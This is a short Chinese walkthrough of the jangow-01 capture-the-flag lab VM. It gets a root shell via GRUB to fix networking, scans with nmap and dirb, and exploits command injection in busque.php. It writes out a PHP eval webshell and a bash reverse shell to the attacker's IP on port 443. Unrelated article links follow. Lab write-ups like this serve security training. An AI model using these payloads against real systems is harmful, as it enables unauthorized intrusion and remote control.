当前位置: 首页 > news >正文

vulhub靶场jangow-01-1.0.1

news 来源:原创 2025/5/28 2:24:23

启动靶机时点shift停在这个界面

点e进入编辑页面,把ro改成rw signie init=/bin/bash

Ctrl+x保存,ip a查看网卡信息

vim /etc/network/interfaces

把enp0s17改为ens33,保存退出

重启靶机,nmap扫ip

ip为192.168.93.179

nmap扫端口

扫出21,80两个端口

dirb扫目录

查看web页面

site点击右上的Buscar

发现一个传参点

发现可以执行命令

上传1.txt发现可以上传

192.168.93.179/site/busque.php?buscar=echo '123' > 1.txt

上传一句话木马

192.168.93.179/site/busque.php?buscar=echo '<?php @eval($_POST[cmd]);?>' > shell.php

上传一个反弹shell的php文件(只能用443端口)

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.93.145/443 0>&1'");?>

nc开启监听,反弹成功

相关文章:

  • 数据结构之循环队列的顺序结构基本操作-基本结构-初始化-入队-出队-判断队列是否为空-获取队头元素
  • 当AI重构编程范式:Java 24的进化逻辑与技术深水区的战略突围
  • 【ESP32S3】esp32获取串口数据并通过http上传到前端
  • 造成服务器网络连接不稳定的原因是什么?
  • 【Python】pillow库学习笔记2-ImageFilter类和ImageEnhance类
  • PHP If...Else 语句详解
  • 用户模块——自定义业务异常
  • 【react】实现路由返回拦截的多种方式
  • Three学习入门(四)
  • DeepSeek助力文案,智能音箱如何改变你的生活?
  • 【企业网络安全防护】一体化管控平台:企业办公效率与安全兼得!
  • 计算机专业本科毕业设计一般有哪些选题?
  • 突破反爬困境:SDK架构设计,为什么选择独立服务模式(四)
  • Web前端之JavaScript的DOM操作冷门API
  • 一个简单的用C#实现的分布式雪花ID算法
  • OpenCV图像拼接(6)根据权重图对源图像进行归一化处理函数normalizeUsingWeightMap()
  • 鸿蒙第三方解析(一)
  • 3. 轴指令(omron 机器自动化控制器)——>MC_GearIn
  • ollama迁移已下载的单个模型到服务器
  • mysql部署错误
  • 建网站需要哪些费用/百度店铺
  • 如何做网站百科/百度极速版app下载安装
  • 高端大气网站欣赏/今日头条新闻消息
  • 沧州网站建设公司电话/营销模式有几种
  • 有没有做网站的/长沙网站推广合作
  • 莱芜工商网站/关于友情链接的作用有